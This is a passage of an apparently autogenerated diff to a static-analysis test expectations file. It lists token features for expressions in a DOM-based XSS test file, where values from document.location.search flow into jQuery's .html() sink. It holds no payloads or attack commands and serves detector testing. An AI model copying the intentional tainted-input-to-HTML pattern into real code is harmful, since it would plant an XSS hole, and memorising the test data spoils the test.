URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:388:10:388:15 | taint2 | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:388:10:388:15 | taint2 | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:388:10:388:15 | taint2 | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:388:10:388:15 | taint2 | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:388:19:388:19 | 2 | assignedToPropName | taint2 | +| autogenerated/Xss/DomBasedXss/tst.js:388:19:388:19 | 2 | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:388:19:388:19 | 2 | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:388:19:388:19 | 2 | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:388:19:388:19 | 2 | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:388:19:388:19 | 2 | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:389:3:389:3 | $ | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:389:3:389:3 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:389:3:389:3 | $ | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:389:3:389:3 | $ | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:389:3:389:3 | $ | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:389:3:389:11 | $('myId') | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:389:3:389:11 | $('myId') | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:389:3:389:11 | $('myId') | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:389:3:389:11 | $('myId') | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:389:3:389:11 | $('myId') | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:389:3:389:11 | exceptional return of $('myId') | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:389:3:389:11 | exceptional return of $('myId') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:389:3:389:11 | exceptional return of $('myId') | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:389:3:389:11 | exceptional return of $('myId') | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:389:3:389:11 | exceptional return of $('myId') | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:389:3:389:16 | $('myId').html | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:389:3:389:16 | $('myId').html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:389:3:389:16 | $('myId').html | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:389:3:389:16 | $('myId').html | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:389:3:389:16 | $('myId').html | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:389:3:389:31 | $('myId ... taint2) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:389:3:389:31 | $('myId ... taint2) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:389:3:389:31 | $('myId ... taint2) | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:389:3:389:31 | $('myId ... taint2) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:389:3:389:31 | $('myId ... taint2) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:389:3:389:31 | exceptional return of $('myId ... taint2) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:389:3:389:31 | exceptional return of $('myId ... taint2) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:389:3:389:31 | exceptional return of $('myId ... taint2) | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:389:3:389:31 | exceptional return of $('myId ... taint2) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:389:3:389:31 | exceptional return of $('myId ... taint2) | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:389:5:389:10 | 'myId' | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/tst.js:389:5:389:10 | 'myId' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:389:5:389:10 | 'myId' | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -17415,6 +121120,16 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:389:5:389:10 | 'myId' | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | | autogenerated/Xss/DomBasedXss/tst.js:389:5:389:10 | 'myId' | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/tst.js:389:5:389:10 | 'myId' | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:389:13:389:16 | html | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:389:13:389:16 | html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:389:13:389:16 | html | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:389:13:389:16 | html | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:389:13:389:16 | html | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:389:18:389:23 | target | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:389:18:389:23 | target | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:389:18:389:23 | target | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:389:18:389:23 | target | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:389:18:389:23 | target | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:389:18:389:30 | target.taint2 | CalleeFlexibleAccessPath | $().html | | autogenerated/Xss/DomBasedXss/tst.js:389:18:389:30 | target.taint2 | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:389:18:389:30 | target.taint2 | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -17422,6 +121137,87 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:389:18:389:30 | target.taint2 | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | | autogenerated/Xss/DomBasedXss/tst.js:389:18:389:30 | target.taint2 | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/tst.js:389:18:389:30 | target.taint2 | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:389:25:389:30 | taint2 | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:389:25:389:30 | taint2 | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:389:25:389:30 | taint2 | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:389:25:389:30 | taint2 | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:389:25:389:30 | taint2 | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:391:3:391:8 | target | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:391:3:391:8 | target | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:391:3:391:8 | target | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:391:3:391:8 | target | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:391:3:391:8 | target | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:391:3:391:15 | target.taint3 | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:391:3:391:15 | target.taint3 | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:391:3:391:15 | target.taint3 | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:391:3:391:15 | target.taint3 | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:391:3:391:15 | target.taint3 | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:391:3:391:42 | target. ... .search | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:391:3:391:42 | target. ... .search | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:391:3:391:42 | target. ... .search | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:391:3:391:42 | target. ... .search | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:391:3:391:42 | target. ... .search | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:391:10:391:15 | taint3 | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:391:10:391:15 | taint3 | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:391:10:391:15 | taint3 | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:391:10:391:15 | taint3 | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:391:10:391:15 | taint3 | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:391:19:391:26 | document | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:391:19:391:26 | document | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:391:19:391:26 | document | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:391:19:391:26 | document | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:391:19:391:26 | document | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:391:19:391:35 | document.location | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:391:19:391:35 | document.location | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:391:19:391:35 | document.location | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:391:19:391:35 | 